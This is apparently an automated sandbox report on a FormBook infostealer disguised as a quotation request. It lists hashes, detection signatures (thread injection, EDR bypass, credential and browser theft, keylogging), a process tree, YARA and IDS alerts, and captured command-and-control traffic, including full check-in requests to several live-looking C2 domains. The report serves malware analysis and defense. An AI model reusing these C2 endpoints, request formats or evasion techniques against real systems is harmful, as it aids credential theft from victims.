Windows Analysis Report
Quotation Request-349849.exe

Overview

General Information

Sample name: Quotation Request-349849.exe
Analysis ID: 1574656
MD5: 060d1fa22ca3227bef173104f09a853c
SHA1: d0f22b602ce5640f9594a45008751f027523e1f9
SHA256: 89d993d7acbce99b1378c80d9e0ee143141eb06dd1bd926dd23f941f0ca704ad
Tags: exe, user-TeamDreier

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Quotation Request-349849.exe (PID: 7688 cmdline: "C:\Users\user\Desktop\Quotation Request-349849.exe" MD5: 060D1FA22CA3227BEF173104F09A853C)
    • svchost.exe (PID: 7820 cmdline: "C:\Users\user\Desktop\Quotation Request-349849.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • LcmEonpIrfS.exe (PID: 1104 cmdline: "C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • comp.exe (PID: 8088 cmdline: "C:\Windows\SysWOW64\comp.exe" MD5: 712EF348F7032AA1C80D24600BA5452D)
          • LcmEonpIrfS.exe (PID: 6896 cmdline: "C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6768 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source: 00000007.00000002.2561468809.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000006.00000002.2557800051.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000006.00000002.2560519490.0000000000890000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000006.00000002.2561398327.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000003.00000002.1736836751.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security

Source: 3.2.svchost.exe.400000.0.raw.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 3.2.svchost.exe.400000.0.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\Quotation Request-349849.exe", CommandLine: "C:\Users\user\Desktop\Quotation Request-349849.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation Request-349849.exe", ParentImage: C:\Users\user\Desktop\Quotation Request-349849.exe, ParentProcessId: 7688, ParentProcessName: Quotation Request-349849.exe, ProcessCommandLine: "C:\Users\user\Desktop\Quotation Request-349849.exe", ProcessId: 7820, ProcessName: svchost.exe
Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\Quotation Request-349849.exe", CommandLine: "C:\Users\user\Desktop\Quotation Request-349849.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation Request-349849.exe", ParentImage: C:\Users\user\Desktop\Quotation Request-349849.exe, ParentProcessId: 7688, ParentProcessName: Quotation Request-349849.exe, ProcessCommandLine: "C:\Users\user\Desktop\Quotation Request-349849.exe", ProcessId: 7820, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-13T13:07:23.267453+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49822 | 38.47.233.21 | 80 | TCP
2024-12-13T13:07:48.401968+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49880 | 172.67.137.47 | 80 | TCP
2024-12-13T13:08:05.631634+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49924 | 206.238.89.119 | 80 | TCP
2024-12-13T13:08:20.715432+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49961 | 66.29.149.46 | 80 | TCP
2024-12-13T13:08:36.422986+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49990 | 217.70.184.50 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-13T13:07:23.267453+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49822 | 38.47.233.21 | 80 | TCP
2024-12-13T13:07:48.401968+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49880 | 172.67.137.47 | 80 | TCP
2024-12-13T13:08:05.631634+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49924 | 206.238.89.119 | 80 | TCP
2024-12-13T13:08:20.715432+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49961 | 66.29.149.46 | 80 | TCP
2024-12-13T13:08:36.422986+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49990 | 217.70.184.50 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-13T13:07:40.295192+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49858 | 172.67.137.47 | 80 | TCP
2024-12-13T13:07:42.951429+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49868 | 172.67.137.47 | 80 | TCP
2024-12-13T13:07:45.607692+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49874 | 172.67.137.47 | 80 | TCP
2024-12-13T13:07:57.623567+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49902 | 206.238.89.119 | 80 | TCP
2024-12-13T13:08:00.279671+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49911 | 206.238.89.119 | 80 | TCP
2024-12-13T13:08:02.936016+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49918 | 206.238.89.119 | 80 | TCP
2024-12-13T13:08:12.721564+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49941 | 66.29.149.46 | 80 | TCP
2024-12-13T13:08:15.375502+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49948 | 66.29.149.46 | 80 | TCP
2024-12-13T13:08:18.034708+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49955 | 66.29.149.46 | 80 | TCP
2024-12-13T13:08:27.793769+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49978 | 217.70.184.50 | 80 | TCP
2024-12-13T13:08:30.458875+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49985 | 217.70.184.50 | 80 | TCP
2024-12-13T13:08:33.827966+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49989 | 217.70.184.50 | 80 | TCP


AV Detection

Source: Quotation Request-349849.exe, ReversingLabs: Detection: 47%
Source: Yara match, File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000007.00000002.2561468809.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.2557800051.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.2560519490.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.2561398327.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1736836751.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1736362212.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1737238924.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.2559379970.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: Quotation Request-349849.exe, Joe Sandbox ML: detected
Source: Quotation Request-349849.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: comp.pdb source: svchost.exe, 00000003.00000002.1736652704.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1700765800.000000000341A000.00000004.00000020.00020000.00000000.sdmp, LcmEonpIrfS.exe, 00000005.00000002.2558594829.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: LcmEonpIrfS.exe, 00000005.00000002.2557763913.00000000000AE000.00000002.00000001.01000000.00000005.sdmp, LcmEonpIrfS.exe, 00000007.00000000.1802114008.00000000000AE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: comp.pdbGCTL source: svchost.exe, 00000003.00000002.1736652704.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1700765800.000000000341A000.00000004.00000020.00020000.00000000.sdmp, LcmEonpIrfS.exe, 00000005.00000002.2558594829.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: Quotation Request-349849.exe, 00000000.00000003.1329291925.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, Quotation Request-349849.exe, 00000000.00000003.1329853611.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1631379626.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1633192176.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1736871336.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1736871336.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000006.00000003.1737169537.0000000000934000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000003.1738926015.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2560633514.0000000000ACE000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2560633514.0000000000930000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Quotation Request-349849.exe, 00000000.00000003.1329291925.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, Quotation Request-349849.exe, 00000000.00000003.1329853611.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.1631379626.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1633192176.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1736871336.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1736871336.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, comp.exe, comp.exe, 00000006.00000003.1737169537.0000000000934000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000003.1738926015.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2560633514.0000000000ACE000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2560633514.0000000000930000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: comp.exe, 00000006.00000002.2558167888.0000000000620000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2561548663.000000000311C000.00000004.10000000.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559865368.00000000025CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2033303395.00000000062BC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: comp.exe, 00000006.00000002.2558167888.0000000000620000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2561548663.000000000311C000.00000004.10000000.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559865368.00000000025CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2033303395.00000000062BC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Quotation Request-349849.exe, Code function: 0_2_0083445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0083445A
Source: C:\Users\user\Desktop\Quotation Request-349849.exe, Code function: 0_2_0083C6D1 FindFirstFileW,FindClose, 0_2_0083C6D1
Source: C:\Users\user\Desktop\Quotation Request-349849.exe, Code function: 0_2_0083C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0083C75C
Source: C:\Users\user\Desktop\Quotation Request-349849.exe, Code function: 0_2_0083EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0083EF95
Source: C:\Users\user\Desktop\Quotation Request-349849.exe, Code function: 0_2_0083F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0083F0F2
Source: C:\Users\user\Desktop\Quotation Request-349849.exe, Code function: 0_2_0083F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0083F3F3
Source: C:\Users\user\Desktop\Quotation Request-349849.exe, Code function: 0_2_008337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_008337EF
Source: C:\Users\user\Desktop\Quotation Request-349849.exe, Code function: 0_2_00833B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00833B12
Source: C:\Users\user\Desktop\Quotation Request-349849.exe, Code function: 0_2_0083BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0083BCBC
Source: C:\Windows\SysWOW64\comp.exe, Code function: 6_2_0041C420 FindFirstFileW,FindNextFileW,FindClose, 6_2_0041C420
Source: C:\Windows\SysWOW64\comp.exe, Code function: 4x nop then xor eax, eax, 6_2_00409F20
Source: C:\Windows\SysWOW64\comp.exe, Code function: 4x nop then pop edi, 6_2_0040E0FB
Source: C:\Windows\SysWOW64\comp.exe, Code function: 4x nop then mov ebx, 00000004h, 6_2_02D90528

Networking

Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49902 -> 206.238.89.119:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49858 -> 172.67.137.47:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49880 -> 172.67.137.47:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49880 -> 172.67.137.47:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49868 -> 172.67.137.47:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49918 -> 206.238.89.119:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49911 -> 206.238.89.119:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49941 -> 66.29.149.46:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49874 -> 172.67.137.47:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49822 -> 38.47.233.21:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49822 -> 38.47.233.21:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49948 -> 66.29.149.46:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49978 -> 217.70.184.50:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49955 -> 66.29.149.46:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49990 -> 217.70.184.50:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49990 -> 217.70.184.50:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49989 -> 217.70.184.50:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49924 -> 206.238.89.119:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49924 -> 206.238.89.119:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49985 -> 217.70.184.50:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49961 -> 66.29.149.46:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49961 -> 66.29.149.46:80
Source: Joe Sandbox View, IP Address: 217.70.184.50
Source: Joe Sandbox View, ASN Name: COGENT-174US
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View, ASN Name: ADVANTAGECOMUS
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (6 occurrences)
Source: C:\Users\user\Desktop\Quotation Request-349849.exe, Code function: 0_2_008422EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_008422EE
Source: global traffic, HTTP traffic detected:
  GET /t67p/?UZkt_p=7q1CHTqE7xA4Hb6UdPg4tnZI1eLzKcnykAAaTe838bXHA/ymbLu0PDKYOxDYCUf7LwmCLOma6qOkbyv7NKEXK5swGMfjJNS9OKmwWbAAHFg65wmu/s0j5u+YMxZCZuR1sUVf7BfBaxXx&Er=qt9d5V HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.5
  Host: www.qqa79.top
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Source: global traffic, HTTP traffic detected:
  GET /vjnn/?UZkt_p=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH2FtKgHUwtP7LZToi+NLiM5u8oda1xOl7pN9QCYN1UR2qYINqcP5uKuM1&Er=qt9d5V HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.5
  Host: www.gk88top.top
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Source: global traffic, HTTP traffic detected:
  GET /2mep/?Er=qt9d5V&UZkt_p=Qs7dTkG74ZlbzDPIks80sLprU65g+bEtyeoxhvOotfrZ9WhcV54Y9rQsYH5lTs77muDKHbL5HIFuHfk3BCfdk4oV88xQLJu313/wS+c/dWkGwsg/R2WIJaTqq/By1MtUaaLvo6grX4O5 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.5
  Host: www.127358.win
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Source: global traffic, HTTP traffic detected:
  GET /cnve/?UZkt_p=2VDSQdlG5RaW3hcOSzrtXrxDd4bhZ8b1rLrGGnoiqQrQ5oU7TABHb8GSGDxsLG7YK+gXk2baIuNiiMBLfcdVYx8sa0WL+tT4casLEwE0iohoJSZhnQSJqMleUJfhtsmPpk3GYPvE1sgo&Er=qt9d5V HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.5
  Host: www.infohive.website
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Source: global traffic, HTTP traffic detected:
  GET /ead0/?UZkt_p=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBis+/iOoNTjmW2l9qNTHM4rN5vAuihI7D9EwPr7Z7opV/5wbcLxFzIpB/&Er=qt9d5V HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.5
  Host: www.sunnyz.store
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Source: global traffic, DNS traffic detected: DNS query: www.qqa79.top
Source: global traffic, DNS traffic detected: DNS query: www.gk88top.top
Source: global traffic, DNS traffic detected: DNS query: www.127358.win
Source: global traffic, DNS traffic detected: DNS query: www.infohive.website
Source: global traffic, DNS traffic detected: DNS query: www.sunnyz.store
Source: unknown, HTTP traffic detected:
  POST /vjnn/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.5
  Host: www.gk88top.top
  Content-Type: application/x-www-form-urlencoded
  Connection: close
  Content-Length: 219
  Cache-Control: no-cache
  Origin: http://www.gk88top.top
  Referer: http://www.gk88top.top/vjnn/
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
  Data Ascii: UZkt_p=y/nbf6lCzqeuPysmEJy86ffNMABc7U2Y99v9br8RWFDR/ZZ9OBNoxvdWw4os3r7Oxy5acUB9wcG/AsK2D98v3Vh9+BRRmsPKFhUVzbm0AYKrw9Ob1Jx4v+NQV6BOVmu6UbAgTNoQLpcX7w6Dpk9CpKgqItS5gLPeurZ8BCVSUujg6elnCiqUoE3w/K/V1wsTLoltwVExHrMQGPTpNQ==
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Fri, 13 Dec 2024 12:07:22 GMT
  Content-Type: text/html
  Content-Length: 548
  Connection: close
  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Fri, 13 Dec 2024 12:07:45 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Vary: Accept-Encoding
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uMcLC2ORiWh7piRBirqeAFWQkZ8SryRH366t50yY%2FP7Wpk1QZ%2BVre4YDwPv7cKODQaGo%2Fz3%2FpbjqYgWeV%2FqLYEYxJf89XDYTKlK6kUU2tn5V3OU%2BVcqsv7aOfDRPaZ5IRbw%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8f15d5ea5cd078e7-EWR
  Content-Encoding: gzip
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=2069&min_rtt=2069&rtt_var=1034&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1895&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
